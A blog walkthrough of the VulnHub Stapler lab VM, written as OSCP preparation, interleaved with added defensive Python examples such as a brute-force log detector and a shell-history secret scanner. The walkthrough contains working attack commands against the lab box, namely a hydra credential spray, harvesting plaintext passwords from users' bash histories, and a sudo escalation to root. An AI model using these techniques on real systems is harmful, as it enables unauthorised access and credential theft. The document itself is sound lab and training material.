Stapler Walkthrough (OSCP Prep) - c0dedead.io

Stapler Walkthrough (OSCP Prep)

Introduction

The Stapler 1 virtual machine was released on VulnHub in 2016. Authored by g0tmi1k, this is a very simple machine which can be rooted easily within a short time, at least by taking one of the multiple paths.

In this post, we’ll go over Stapler from boot to root.

Description

+---------------------------------------------------------+
|                                                         |
|                                  __..--''\              |
|                          __..--''         \             |
|                  __..--''          __..--''             |
|          __..--''          __..--''       |             |
|          \ o        __..--''____....----""              |
|           \__..--''\                                    |
|           |         \                                   |
|          +----------------------------------+           |
|          +----------------------------------+           |
|                                                         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|   Name: Stapler           |          IP: DHCP           |
|   Date: 2016-June-08      |        Goal: Get Root!      |
| Author: g0tmi1k           | Difficultly: ??? ;)         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|                                                         |
| + Average beginner/intermediate VM, only a few twists   |
|   + May find it easy/hard (depends on YOUR background)  |
|   + ...also which way you attack the box                |
|                                                         |
| + It SHOULD work on both VMware and Virtualbox          |
|   + REBOOT the VM if you CHANGE network modes           |
|   + Fusion users, you'll need to retry when importing   |
|                                                         |
| + There are multiple methods to-do this machine         |
|   + At least two (2) paths to get a limited shell       |
|   + At least three (3) ways to get a root access        |
|                                                         |
| + Made for BsidesLondon 2016                            |
|   + Slides: https://download.vulnhub.com/media/stapler/ |
|                                                         |
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman  |
|   + ...and shout-outs to the VulnHub-CTF Team =)        |
|                                                         |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
|                                                         |
|       --[[~~Enjoy. Have fun. Happy Hacking.~~]]--       |
|                                                         |
+---------------------------------------------------------+

Before We Begin

The Stapler VM comes as an OVF image that must be imported into your hypervisor. Unfortunately, you may get some errors trying to import the OVF file into a newer version of VMware.

VMware fails to import Stapler.ovf

To fix this, open the .ovf file in a text editor and replace every occurrence of the word Caption with ElementName. Then delete the .mf file in the same directory. Check out this Reddit post for more details.

Now we can import the virtual machine into VMware. Change the network configuration, create a snapshot, and we’re ready to go.
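Why the .mf file has to go is worth seeing once: it is the package manifest, a list of SHA1 (or SHA256) digests for every file in the OVF bundle, and the importer refuses a descriptor whose digest no longer matches. The script below is an added example, not part of the walkthrough or of the Stapler package; the OVF fragment and manifest it uses are constructed, and the "SHA1(name)= digest" line shape is the standard OVF manifest format. It also goes one step beyond the fix above and regenerates the manifest instead of deleting it, which keeps the integrity check for the untouched disk images.

```python
import hashlib
import re

# OVF manifest lines look like "SHA1(Stapler.ovf)= <hex>" (one per packaged file).
MANIFEST_LINE = re.compile(
    r"^(?P<alg>SHA1|SHA256)\((?P<name>[^)]+)\)=\s*(?P<digest>[0-9a-fA-F]+)$"
)

# Constructed stand-ins: a minimal descriptor fragment using the rasd:Caption
# element that newer VMware rejects, and the manifest an exporter wrote for it.
SAMPLE_OVF = (
    "<Item>\n"
    "  <rasd:Caption>sataController0</rasd:Caption>\n"
    "  <rasd:ResourceType>20</rasd:ResourceType>\n"
    "</Item>\n"
)
SAMPLE_MANIFEST = (
    "SHA1(Stapler.ovf)= " + hashlib.sha1(SAMPLE_OVF.encode()).hexdigest() + "\n"
    "SHA1(Stapler-disk1.vmdk)= " + hashlib.sha1(b"constructed disk bytes").hexdigest() + "\n"
)


def patch_ovf(ovf_text: str) -> str:
    """Apply the fix from the walkthrough: rename every Caption element to ElementName."""
    return ovf_text.replace("Caption", "ElementName")


def verify_manifest(manifest_text: str, files: dict) -> dict:
    """Check each manifest entry against the file bytes we have; returns {name: ok}.

    A False here is exactly what the importer sees after the descriptor is
    hand-edited, which is why the stale .mf has to be removed or regenerated.
    """
    results = {}
    for line in manifest_text.splitlines():
        m = MANIFEST_LINE.match(line.strip())
        if not m or m.group("name") not in files:
            continue
        digest = hashlib.new(m.group("alg").lower(), files[m.group("name")]).hexdigest()
        results[m.group("name")] = digest == m.group("digest").lower()
    return results


def fix_package(ovf_text: str, manifest_text: str) -> tuple:
    """Patch the descriptor and rewrite only its manifest entry; other entries stay intact."""
    patched = patch_ovf(ovf_text)
    new_lines = []
    for line in manifest_text.splitlines():
        m = MANIFEST_LINE.match(line.strip())
        if m and m.group("name").endswith(".ovf"):
            alg = m.group("alg")
            digest = hashlib.new(alg.lower(), patched.encode()).hexdigest()
            line = f"{alg}({m.group('name')})= {digest}"
        new_lines.append(line)
    return patched, "\n".join(new_lines) + "\n"
```

Deleting the manifest works because importers treat a missing .mf as "no integrity check requested"; regenerating it is the tidier option when you want the VMDK digests still verified.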

Tools

Host Discovery

Let’s find the IP address of the Stapler box with arp-scan:

┌──(ori0n㉿kali)-[~/stapler]
└─$ sudo arp-scan -l
[sudo] password for ori0n:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:e2:a7:d8, IPv4: 10.0.10.10
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.10.1       00:50:56:c0:00:08       VMware, Inc.
10.0.10.2       00:50:56:fb:3b:27       VMware, Inc.
10.0.10.101     00:0c:29:60:54:c7       VMware, Inc.
10.0.10.199     00:50:56:e7:f8:fb       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.000 seconds (128.00 hosts/sec). 4 responded

So it’s on the network at address 10.0.10.101. I’ll update /etc/hosts to create an alias:

10.0.10.101     stapler

Scanning

We’ll use rustscan to look for open ports and perform an nmap version scan.

┌──(ori0n㉿kali)-[~/stapler]
└─$ rustscan -a stapler --  -sV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/ori0n/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.0.10.101:21
Open 10.0.10.101:53
Open 10.0.10.101:80
Open 10.0.10.101:139
Open 10.0.10.101:666
Open 10.0.10.101:3306
Open 10.0.10.101:22
Open 10.0.10.101:12380
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-06 19:27 CDT
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 19:27
Scanning 10.0.10.101 [2 ports]
Completed Ping Scan at 19:27, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 19:27
Scanning stapler (10.0.10.101) [8 ports]
Discovered open port 3306/tcp on 10.0.10.101
Discovered open port 53/tcp on 10.0.10.101
Discovered open port 80/tcp on 10.0.10.101
Discovered open port 22/tcp on 10.0.10.101
Discovered open port 139/tcp on 10.0.10.101
Discovered open port 21/tcp on 10.0.10.101
Discovered open port 12380/tcp on 10.0.10.101
Discovered open port 666/tcp on 10.0.10.101
Completed Connect Scan at 19:27, 0.00s elapsed (8 total ports)
Initiating Service scan at 19:27
Scanning 8 services on stapler (10.0.10.101)
Completed Service scan at 19:27, 11.04s elapsed (8 services on 1 host)
NSE: Script scanning 10.0.10.101.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:27
Completed NSE at 19:27, 0.10s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:27
Completed NSE at 19:27, 0.01s elapsed
Nmap scan report for stapler (10.0.10.101)
Host is up, received syn-ack (0.00072s latency).
Scanned at 2021-08-06 19:27:17 CDT for 11s

PORT      STATE SERVICE     REASON  VERSION
21/tcp    open  ftp         syn-ack vsftpd 2.0.8 or later
22/tcp    open  ssh         syn-ack OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp    open  domain      syn-ack dnsmasq 2.75
80/tcp    open  http        syn-ack PHP cli server 5.5 or later
139/tcp   open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp   open  tcpwrapped  syn-ack
3306/tcp  open  mysql       syn-ack MySQL 5.7.12-0ubuntu1
12380/tcp open  http        syn-ack Apache httpd 2.4.18 ((Ubuntu))
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.85 seconds

There is quite a lot going on here. We’ll start with the uncommon ports.

Enumerating Port 12380 (HTTP)

Port 12380 looks interesting. It appears to be running a web server, so open a web browser and head to http://stapler:12380.

Web server on port 12380

Not much here. Checking the source, there are a couple of comments of interest:

<!-- A message from the head of our HR department, Zoe, if you are looking at this, we want to hire you! -->
<!--    Change the image source '/images/default.jpg' with your favourite image.     -->

So we have a potential username, Zoe, and maybe an /images directory to enumerate. Trying to get to http://stapler:12380/images/ simply redirects to the index page, however. In fact, it seems all URLs on this port redirect to the index page. We’ll move on for now.

Port 666

We also see something running on port 666. We can use netcat to see if we can figure out what’s running there:

┌──(ori0n㉿kali)-[~/stapler]
└─$ nc stapler 666
PdHp,2
      message2.jpgUT    +QWJQWux
                                z
                                 TPA@ UTT2>RDKJj"DL[E
                                                     0<ĴʮnVWH
_dr9uYoXY2e=y}a>` :y^sC

...

And we get a bunch of gibberish. It appears to be binary data, but we can see the string “message2.jpg” buried within. Let’s try to pipe this data into a file for a deeper look.

Reconnecting to the port right away gets the connection dropped immediately, so we add a sleep command to wait a while before connecting again. Then we’ll see whether the file command can determine the type of the captured data.

┌──(ori0n㉿kali)-[~/stapler]
└─$ sleep 60; nc stapler  666 > data
^C

┌──(ori0n㉿kali)-[~/stapler]
└─$ file data
data: Zip archive data, at least v2.0 to extract

┌──(ori0n㉿kali)-[~/stapler]
└─$ mv data data.zip; unzip data.zip
Archive:  data.zip
  inflating: message2.jpg

It looks like a Zip file. After unpacking, we find a JPG image. That would explain the message2.jpg string we saw buried in the data. Let’s see if it gives us anything useful.

message2.jpg

We get another potential username and a segmentation fault error message. Perhaps this is a clue for later on in the box. Or perhaps g0tmi1k is trolling us and this is just a rabbit hole.
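The file command recognised the blob by its leading bytes, and the reason message2.jpg was legible in the raw stream is that ZIP stores entry names uncompressed in every local file header. The script below is an added example, not code from the walkthrough, that reproduces both observations: a small magic-byte identifier and a walk over the local headers. The sample stream it inspects is constructed in memory (a zip holding a fake JPEG) so it runs offline.

```python
import io
import struct
import zipfile

# Leading-byte signatures for a few formats, the same idea `file` uses (constructed table).
MAGIC = [
    (b"PK\x03\x04", "Zip archive data"),
    (b"\x89PNG\r\n\x1a\n", "PNG image data"),
    (b"\xff\xd8\xff", "JPEG image data"),
    (b"\x1f\x8b", "gzip compressed data"),
]


def identify(data: bytes) -> str:
    """Return a `file`-style description based on the first bytes of the blob."""
    for sig, desc in MAGIC:
        if data.startswith(sig):
            return desc
    return "data"


def list_zip_entries(data: bytes) -> list:
    """Walk the ZIP local file headers in order and return the entry names.

    Names sit uncompressed right after each 30-byte header, which is why
    'message2.jpg' is readable in the raw stream before unpacking.
    """
    names = []
    off = 0
    while data[off:off + 4] == b"PK\x03\x04":
        # 26 bytes of fixed fields follow the 4-byte signature.
        (_ver, flags, _method, _mtime, _mdate, _crc,
         csize, _usize, nlen, xlen) = struct.unpack("<HHHHHIIIHH", data[off + 4:off + 30])
        names.append(data[off + 30:off + 30 + nlen].decode("utf-8", "replace"))
        if flags & 0x0008:
            # Streamed zip: sizes live in a trailing data descriptor and csize here
            # is 0, so the payload cannot be skipped safely. Stop rather than guess.
            break
        off += 30 + nlen + xlen + csize
    return names


def extract_entry(data: bytes, name: str) -> bytes:
    """Pull one entry out with the standard library (the `unzip` step)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(name)


def build_sample_stream() -> bytes:
    """Constructed stand-in for the bytes the port-666 service sends: a zip holding a JPEG."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("message2.jpg", b"\xff\xd8\xff\xe0" + b"JFIF" + b"\x00" * 64)
    return buf.getvalue()
```

The data-descriptor check matters in practice: archives written to a non-seekable stream set flag bit 3 and leave the header sizes at zero, so a header walk like this one must stop there and fall back to the central directory at the end of the file.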

Enumerating Port 139 (smbd)

SMB is often a good place to find information and/or exploitable security holes. Let’s check it out.

For starters, run enum4linux. Within the sea of text, we can find a long list of usernames.

┌──(ori0n㉿kali)-[~/stapler]
└─$ enum4linux -a stapler
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Aug  6 19:57:54 2021

...


[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)

...

Copy these usernames to a file called users.txt. These will definitely come in handy.

Brute Forcing with Hydra

With this list of usernames, we can attempt to crack some passwords. Because it isn’t uncommon for users to use their usernames as their passwords as well, let’s try a quick brute force with hydra.

Because brute-forcing SSH is painfully slow, we’ll try cracking the FTP server first:

┌──(ori0n㉿kali)-[~/stapler]
└─$ hydra -L users.txt -P users.txt stapler ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-06 20:03:11
[DATA] max 16 tasks per 1 server, overall 16 tasks, 900 login tries (l:30/p:30), ~57 tries per task
[DATA] attacking ftp://stapler:21/
[21][ftp] host: stapler   login: SHayslett   password: SHayslett

After only a minute or two, we have a hit. I’ll leave this running and see what I can do with these creds.
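From the other side of the wire, a run like this is loud: 900 login attempts from one client in a couple of minutes, cycling through thirty usernames. The detector below is an added example, not part of the walkthrough, written against the stock vsftpd.log format (assumed here: lines such as `Fri Aug  6 20:03:11 2021 [pid 1234] [SHayslett] FAIL LOGIN: Client "10.0.10.10"`). It flags any client that exceeds a failure threshold inside a sliding window, counts the distinct usernames tried, and records whether a successful login followed the burst. The log it runs on is constructed in the script.

```python
import re
from collections import defaultdict
from datetime import datetime

# Default vsftpd.log line shape (assumption: stock vsftpd logging, not xferlog format):
#   Fri Aug  6 20:03:11 2021 [pid 1234] [SHayslett] FAIL LOGIN: Client "10.0.10.10"
LOG_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<client>[^"]+)"'
)


def parse_line(line: str):
    """Parse one log line into a dict, or None for lines that are not login events."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(re.sub(r" {2,}", " ", m.group("ts")), "%a %b %d %H:%M:%S %Y")
    return {"ts": ts, "user": m.group("user"),
            "ok": m.group("result") == "OK", "client": m.group("client")}


def detect_bruteforce(lines, threshold: int = 10, window_s: int = 60) -> list:
    """Flag clients with >= threshold failed logins inside any window_s-second window.

    Each alert records how many distinct usernames were tried (a spray over a
    user list touches many) and whether a successful login followed the burst,
    which is the case that needs an immediate password reset.
    """
    by_client = defaultdict(list)
    for ev in filter(None, map(parse_line, lines)):
        by_client[ev["client"]].append(ev)

    alerts = []
    for client, evs in by_client.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if not e["ok"]]
        best, j = 0, 0
        for i in range(len(fails)):  # two-pointer sliding window over failure times
            while (fails[i]["ts"] - fails[j]["ts"]).total_seconds() > window_s:
                j += 1
            best = max(best, i - j + 1)
        if best < threshold:
            continue
        last_fail = fails[-1]["ts"]
        alerts.append({
            "client": client,
            "max_failures_in_window": best,
            "distinct_users": len({e["user"] for e in fails}),
            "success_after_failures": any(e["ok"] and e["ts"] >= last_fail for e in evs),
        })
    return alerts


def build_sample_log() -> list:
    """Constructed log: one client cycles six usernames twice in ~22 s, then logs in."""
    users = ["peter", "RNunemaker", "ETollefson", "DSwanger", "AParnell", "SHayslett"]
    lines, sec = [], 0
    for _ in range(2):
        for u in users:
            lines.append(f'Fri Aug  6 20:03:{sec:02d} 2021 [pid {1000 + sec}] [{u}] '
                         f'FAIL LOGIN: Client "10.0.10.10"')
            sec += 2
    lines.append(f'Fri Aug  6 20:03:{sec:02d} 2021 [pid {1000 + sec}] [SHayslett] '
                 f'OK LOGIN: Client "10.0.10.10"')
    lines.append('Fri Aug  6 20:05:01 2021 [pid 2000] [jamie] FAIL LOGIN: Client "10.0.10.5"')
    lines.append('Fri Aug  6 20:05:02 2021 [pid 2001] CONNECT: Client "10.0.10.5"')
    return lines
```

The "success after failures" flag is the one worth paging on: a burst that ends in an OK LOGIN is a compromised account, not just noise, and the distinct-user count separates a spray over an enumerated user list (as here, where SMB handed out the names) from someone mistyping one password.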

Getting In and a Quick Privesc

Try to SSH in with the cracked credentials:

┌──(ori0n㉿kali)-[~/stapler]
└─$ ssh SHayslett@stapler
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------
SHayslett@stapler's password:
Welcome back!



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

SHayslett@red:~$

And we’re in! First, let’s check out our privileges:

SHayslett@red:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for SHayslett:
Sorry, user SHayslett may not run sudo on red.

No luck with sudo. Digging through the home directories often uncovers diamonds. Let’s look for readable files:

SHayslett@red:~$ find /home -readable
/home
/home/MFrei
/home/MFrei/.bashrc
/home/MFrei/.bash_history
/home/MFrei/.bash_logout
/home/MFrei/.profile
/home/Sam
/home/Sam/.bashrc
/home/Sam/.bash_history
/home/Sam/.bash_logout
/home/Sam/.profile
/home/CCeaser
/home/CCeaser/.bashrc
/home/CCeaser/.bash_history
/home/CCeaser/.bash_logout
/home/CCeaser/.profile
/home/www
/home/www/.bashrc
/home/www/.bash_logout
/home/www/.profile
/home/DSwanger
/home/DSwanger/.bashrc
/home/DSwanger/.bash_history
/home/DSwanger/.bash_logout
/home/DSwanger/.profile

...

So there are a whole lot of readable files. The .bash_history files might provide something we can use, so let’s use a bit of command-line fu to dump them:

SHayslett@red:~$ find /home -name .bash_history -exec cat {} \;
exit
exit
free
exit
exit
exit
exit
exit
exit
exit
exit
exit
exit
exit
top
ps aux
exit
exit
id
cat: /home/peter/.bash_history: Permission denied
find: ‘/home/peter/.cache’: Permission denied
exit
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
exit
exit
exit
exit
exit
exit
exit
exit
whoami
exit
exit
exit
top
exit

We get more creds!
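Passwords passed as command-line arguments end up in .bash_history, and while the command runs they are also visible to every local user through ps (the sshpass man page warns about exactly this). The scanner below is an added example, not part of the walkthrough, that a sysadmin could run over collected history files to find such lines, redact the secret for the report, and list the accounts that need rotating. Its pattern table and the sample history are constructed; the two sshpass lines in the sample are the ones found on this box.

```python
import re

# Command-line shapes that put a password into the process arguments, and so into
# shell history and `ps`. Constructed list; each regex names the secret group.
SECRET_PATTERNS = [
    ("sshpass -p", re.compile(r"\bsshpass\s+-p\s*(?P<secret>\S+)")),
    ("mysql -p<pw>", re.compile(r"\bmysql\b.*?\s-p(?P<secret>\S+)")),
    ("--password=", re.compile(r"--(?:password|passwd|pass)=(?P<secret>\S+)")),
    ("curl -u user:pw", re.compile(r"\bcurl\b.*?\s-u\s*[^\s:]+:(?P<secret>\S+)")),
]

# user@host target of an sshpass invocation, with or without an explicit `ssh`.
SSHPASS_TARGET = re.compile(r"\bsshpass\s+-p\s*\S+\s+(?:ssh\s+)?(?P<target>\S+@\S+)")


def scan_history(lines) -> list:
    """Return one finding per line that carries an inline credential, secret redacted."""
    findings = []
    for n, line in enumerate(lines, 1):
        for label, rx in SECRET_PATTERNS:
            m = rx.search(line)
            if m:
                redacted = line[:m.start("secret")] + "<redacted>" + line[m.end("secret"):]
                findings.append({"line": n, "pattern": label, "redacted": redacted})
                break  # one finding per line is enough for the report
    return findings


def accounts_to_rotate(lines) -> set:
    """Collect the user@host targets whose passwords were typed on the command line."""
    return {m.group("target") for line in lines for m in [SSHPASS_TARGET.search(line)] if m}


# Constructed history: a mix of harmless commands and the shapes above. Lines 2 and 4
# are the real entries from the box; the rest are made up for the example.
SAMPLE_HISTORY = [
    "ls -lah",
    "sshpass -p thisimypassword ssh JKanode@localhost",
    "apt-get install sshpass",
    "sshpass -p JZQuyIN5 peter@localhost",
    "mysql -u root -p",
    "mysql -u root -pS3cret wordpress",
    "curl -u deploy:hunter2 https://example.invalid/api",
    "exit",
]
```

Note that `mysql -u root -p` (prompting for the password) is correctly left alone; only the `-p<value>` form is flagged. The remediation is the same whatever the tool: rotate the credential, and move to SSH keys or a file with restrictive permissions (sshpass -f, a mysql option file) so the secret never becomes an argument.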

We can use the id command to see if either of these users is likely to have significant privileges on the box.

SHayslett@red:~$ id JKanode
uid=1013(JKanode) gid=1013(JKanode) groups=1013(JKanode)
SHayslett@red:~$ id peter
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)

Hey Peter, man, what you got for us?
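The id output tells the whole story before sudo -l is even run: peter sits in sudo, adm and lxd, and lxd membership on its own is effectively root on Ubuntu, since the group can start containers that mount the host filesystem. The script below is an added example, not part of the walkthrough, that parses id output and reports which of a user's groups carry that kind of weight; the table of risky groups is constructed for the example and the two sample lines are the ones printed above.

```python
import re

# Groups whose membership is root-equivalent or a short step from it on Ubuntu.
# Constructed table for the example; adjust to the groups that matter on your hosts.
PRIVILEGED_GROUPS = {
    "sudo": "may run sudo (see sudo -l for the actual scope)",
    "wheel": "sudo/su group on RHEL-style systems",
    "adm": "can read logs under /var/log",
    "lxd": "can launch containers that mount the host filesystem as root",
    "docker": "same container-to-host exposure as lxd",
    "disk": "raw read/write access to block devices",
    "shadow": "can read password hashes in /etc/shadow",
}

ID_RE = re.compile(r"^uid=(?P<uid>\d+)\((?P<user>[^)]*)\).*?\bgroups=(?P<groups>\S+)")
GROUP_RE = re.compile(r"\d+\(([^)]*)\)")


def parse_id(line: str) -> dict:
    """Parse a line of `id <user>` output into uid, user name and group names."""
    m = ID_RE.match(line.strip())
    if not m:
        raise ValueError(f"not id output: {line!r}")
    return {"uid": int(m.group("uid")), "user": m.group("user"),
            "groups": GROUP_RE.findall(m.group("groups"))}


def audit(id_lines) -> dict:
    """Map each user to the privileged groups they belong to, with why each matters."""
    report = {}
    for line in id_lines:
        info = parse_id(line)
        report[info["user"]] = [(g, PRIVILEGED_GROUPS[g]) for g in info["groups"]
                                if g in PRIVILEGED_GROUPS]
    return report


# The two lines from the box, exactly as id printed them above.
SAMPLE_ID_OUTPUT = [
    "uid=1013(JKanode) gid=1013(JKanode) groups=1013(JKanode)",
    "uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),"
    "46(plugdev),110(lxd),113(lpadmin),114(sambashare)",
]
```

Feed it `id` output for every account in /etc/passwd and you have a quick inventory of who is one group membership away from root; on a box like this one, the adm and lxd entries for peter would stand out even if sudo were locked down.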

Root

Head over to Peter’s account and see what sudo can do for you.

SHayslett@red:~$ su peter
Password:
This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~).  This function can help you with a few settings that should
make your use of the shell easier.

You can:

(q)  Quit and do nothing.  The function will be run again next time.

(0)  Exit, creating the file ~/.zshrc containing just a comment.
     That will prevent this function being run again.

(1)  Continue to the main menu.

(2)  Populate your ~/.zshrc with the configuration recommended
     by the system administrator and exit (you will need to edit
     the file by hand, if so desired).

--- Type one of the keys in parentheses --- q
red% sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter:
Matching Defaults entries for peter on red:
    lecture=always, env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on red:
    (ALL : ALL) ALL

Piece of cake! Let’s get our root shell:

red% sudo -s
red# id
uid=0(root) gid=0(root) groups=0(root)

Get the Flag

Capturing the flag on this box is simple. Head over to the /root directory. We find flag.txt and cat it out:

red# cd /root
red# ls -l
total 72
-rwxr-xr-x 1 root root  1090 Jun  5  2016 fix-wordpress.sh
-rw-r--r-- 1 root root   463 Jun  5  2016 flag.txt
-rw-r--r-- 1 root root   345 Jun  5  2016 issue
-rwxr-xr-x 1 root root   103 Jun  5  2016 python.sh
-rw-r--r-- 1 root root 54405 Jun  5  2016 wordpress.sql
red# cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

Wrapping Up

Stapler ended up being a super simple machine with a very quick path to root. According to the readme, there are at least two paths to a foothold and at least three ways to get root. Perhaps we’ll dig deeper into these in the future.
